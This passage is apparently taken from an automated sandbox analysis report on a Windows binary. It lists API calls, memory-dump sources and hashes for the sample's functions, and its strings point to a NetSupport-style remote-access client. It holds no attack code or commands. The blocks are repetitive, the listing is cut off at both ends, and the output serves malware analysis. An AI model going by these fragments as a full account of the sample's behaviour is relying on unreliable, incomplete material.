                                                                                                              • SetCursorPos.USER32(000000FF,?,?,?), ref: 111193C2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ClientCountCursorFromPointTickWindow$RectScreen
                                                                                                              • String ID:
                                                                                                              • API String ID: 4245181967-0
                                                                                                              • Opcode ID: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
                                                                                                              • Instruction ID: c3d26e7f0e5f190f00e8d03b3c013bb68f2031b9d5661d68f26c10068d749f7e
                                                                                                              • Opcode Fuzzy Hash: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
                                                                                                              • Instruction Fuzzy Hash: 6391F6B5A0060A9FDB14DFB4D588AEEF7F5FB88314F10452ED86A9B244E735B841CB60
                                                                                                              APIs
                                                                                                              • GetWindowTextA.USER32(?,?,00000050), ref: 11025176
                                                                                                              • _strncat.LIBCMT ref: 1102518B
                                                                                                              • SetWindowTextA.USER32(?,?), ref: 11025198
                                                                                                                • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                              • GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025224
                                                                                                              • GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025238
                                                                                                              • SetDlgItemTextA.USER32(?,00001397,?), ref: 11025250
                                                                                                              • SetDlgItemTextA.USER32(?,00001395,?), ref: 11025262
                                                                                                              • SetFocus.USER32(?), ref: 11025265
                                                                                                                • Part of subcall function 11024C70: GetDlgItem.USER32(?,?), ref: 11024CC0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 3832070631-0
                                                                                                              • Opcode ID: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                                              • Instruction ID: 7712de199883e751ea03bfa735f50b434bc7bb1cc5edca5bff12a9cf5cd7df4a
                                                                                                              • Opcode Fuzzy Hash: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                                              • Instruction Fuzzy Hash: 0E4192B5A10359ABE710DB74CC45BBAF7F8FB44714F01452AE61AD76C0EAB4A904CB50
                                                                                                              APIs
                                                                                                                • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(111ED708,E43C2CA5,1110EDDD,00000000,00000000,00000000,E8111B5E,111825D3,000000FF,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000), ref: 1107602E
                                                                                                                • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(0000000C,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,E43C2CA5,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 11076097
                                                                                                                • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(00000024,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,E43C2CA5,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 1107609D
                                                                                                                • Part of subcall function 11075FE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,E43C2CA5,00000000,00000001,00000000,00000000), ref: 110760A7
                                                                                                                • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004D0,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,E43C2CA5,00000000,00000001,00000000,00000000), ref: 110760FC
                                                                                                                • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004F8,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,E43C2CA5,00000000,00000001,00000000,00000000), ref: 11076105
                                                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1105759C
                                                                                                              • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 110575E1
                                                                                                              • SetLastError.KERNEL32(00000078), ref: 110575F4
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 110575FF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalInitializeSection$Library$AddressCreateErrorEventFreeLastLoadProc
                                                                                                              • String ID: Kernel32.dll$WTSGetActiveConsoleSessionId
                                                                                                              • API String ID: 3780373956-3165951319
                                                                                                              • Opcode ID: 13b000d7faa6fd9acbdfe3c5b590adeb65eceb06c65d3f1f2622c8f441c886b5
                                                                                                              • Instruction ID: 5b2845002196474fabc536bb645ff26533f5159a1a467828fb1dae30e08bae14
                                                                                                              • Opcode Fuzzy Hash: 13b000d7faa6fd9acbdfe3c5b590adeb65eceb06c65d3f1f2622c8f441c886b5
                                                                                                              • Instruction Fuzzy Hash: C47149B4A01215AFDB10CFAAC8C0E9AFBF9FF88314F24819AE91597314D771A941CF64
                                                                                                              APIs
                                                                                                                • Part of subcall function 110CEC60: CreateDialogParamA.USER32(00000000,?,1112D7C9,110CBCD0,00000000), ref: 110CECF1
                                                                                                                • Part of subcall function 110CEC60: GetLastError.KERNEL32 ref: 110CEE49
                                                                                                                • Part of subcall function 110CEC60: wsprintfA.USER32 ref: 110CEE78
                                                                                                                • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
                                                                                                                • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
                                                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 110931C9
                                                                                                              • SetWindowLongA.USER32(?,000000EC,00000000), ref: 110931F7
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 11093220
                                                                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109324E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                              • API String ID: 3136964118-2830328467
                                                                                                              • Opcode ID: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
                                                                                                              • Instruction ID: 17cdb21e99cc57644c55c5a770e75091ec79e40792fa9a2895745f392d232910
                                                                                                              • Opcode Fuzzy Hash: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
                                                                                                              • Instruction Fuzzy Hash: AF31E475B04609ABC324CFA5DC95FE7B3E5BB88718F10862CF56A976D0DA34B840CB54
                                                                                                              APIs
                                                                                                              • _malloc.LIBCMT ref: 111370A6
                                                                                                              • _free.LIBCMT ref: 111370DD
                                                                                                                • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                              • _free.LIBCMT ref: 1113716D
                                                                                                                • Part of subcall function 1110F270: InterlockedDecrement.KERNEL32(?), ref: 1110F278
                                                                                                              • _free.LIBCMT ref: 1113713E
                                                                                                                • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$DecrementErrorFreeHeapInterlockedLast__wcstoi64_malloc
                                                                                                              • String ID: *HelpReqServer$Client
                                                                                                              • API String ID: 1390041139-3616015116
                                                                                                              • Opcode ID: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
                                                                                                              • Instruction ID: 8e3468a70864abf3cc9909560d123acfb2a7f2167445c6f0ed38d11247114e31
                                                                                                              • Opcode Fuzzy Hash: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
                                                                                                              • Instruction Fuzzy Hash: 6B313877B001156BDB00DE58DC81BAEF3A9EF88325F154169ED04AB380D675F904C7D5
                                                                                                              APIs
                                                                                                              • PlaySoundA.WINMM(1000,50,00000000,00020001), ref: 11143451
                                                                                                                • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                                              • Beep.KERNEL32(00000000,00000000), ref: 11143415
                                                                                                              • MessageBeep.USER32(00000000), ref: 11143427
                                                                                                              • MessageBeep.USER32(-00000010), ref: 1114343B
                                                                                                              • MessageBeep.USER32(00000000), ref: 1114345D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Beep$Message$PlaySound__isdigit_l
                                                                                                              • String ID: 1000,50
                                                                                                              • API String ID: 3904670044-1941404556
                                                                                                              • Opcode ID: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
                                                                                                              • Instruction ID: 938a5c7d7fad482dacf885287002a424905fd2e62ab59dfe834b6d95de8c57fd
                                                                                                              • Opcode Fuzzy Hash: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
                                                                                                              • Instruction Fuzzy Hash: 93216D66A6C6B272E60105746D847FFFF5E8F81E69F184074E87DC6982EB26E016C321
                                                                                                              APIs
                                                                                                              • GetForegroundWindow.USER32(75BF7AA0,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9017
                                                                                                              • GetCursorPos.USER32(110BFEBC), ref: 110B9026
                                                                                                                • Part of subcall function 1115E6F0: GetWindowRect.USER32(?,?), ref: 1115E70C
                                                                                                              • PtInRect.USER32(110BFEBC,110BFEBC,110BFEBC), ref: 110B9044
                                                                                                              • ClientToScreen.USER32(?,110BFEBC), ref: 110B9066
                                                                                                              • SetCursorPos.USER32(110BFEBC,110BFEBC,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9074
                                                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 110B9081
                                                                                                              • SetCursor.USER32(00000000,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9088
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Cursor$RectWindow$ClientForegroundLoadScreen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3235510773-0
                                                                                                              • Opcode ID: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
                                                                                                              • Instruction ID: ad301b5eb86ee9d8d5bbe419ceb9c49b4424cf1b2c79503272c3df1ff599c8d2
                                                                                                              • Opcode Fuzzy Hash: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
                                                                                                              • Instruction Fuzzy Hash: 8C112EB5E1421A9FCB08DFB4C884DBFF7B8FB84305B108669E52297244DB34E905CBA4
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 1101D0FE
                                                                                                              • LoadIconA.USER32(00000000,0000139A), ref: 1101D14F
                                                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 1101D15F
                                                                                                              • RegisterClassExA.USER32(00000030), ref: 1101D181
                                                                                                              • GetLastError.KERNEL32 ref: 1101D187
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load$ClassCursorErrorIconLastRegister_memset
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 430917334-4108050209
                                                                                                              • Opcode ID: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
                                                                                                              • Instruction ID: 594e7871e039520b7580a936d726e641a3743c14917196a6b4ce4aa29f199296
                                                                                                              • Opcode Fuzzy Hash: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
                                                                                                              • Instruction Fuzzy Hash: 9C018C74C1431DABEF00EFF0C899BDEFBB8AB04708F104029E521BA284E7BA51048F95
                                                                                                              APIs
                                                                                                              • LoadMenuA.USER32(00000000,00002EFD), ref: 1100331D
                                                                                                              • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                                                              • DestroyMenu.USER32(00000000), ref: 11003372
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                              • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                              • API String ID: 468487828-934300333
                                                                                                              • Opcode ID: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
                                                                                                              • Instruction ID: e80103f9713123d07a9bceb05cb6f887813353322251b2c4d1aa2998eabbc516
                                                                                                              • Opcode Fuzzy Hash: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
                                                                                                              • Instruction Fuzzy Hash: E5F0A73EF9466933D31666F53D1AF4BAB485B815ACB060031F524EA740EE14B4018166
                                                                                                              APIs
                                                                                                              • OpenThread.KERNEL32(0000004A,00000000,11147278,?,?,?,?,?,11147278), ref: 1114713A
                                                                                                              • CreateThread.KERNEL32(00000000,00001000,111470B0,?,00000000,?), ref: 1114715E
                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,11147278), ref: 11147169
                                                                                                              • GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,?,?,?,11147278), ref: 11147174
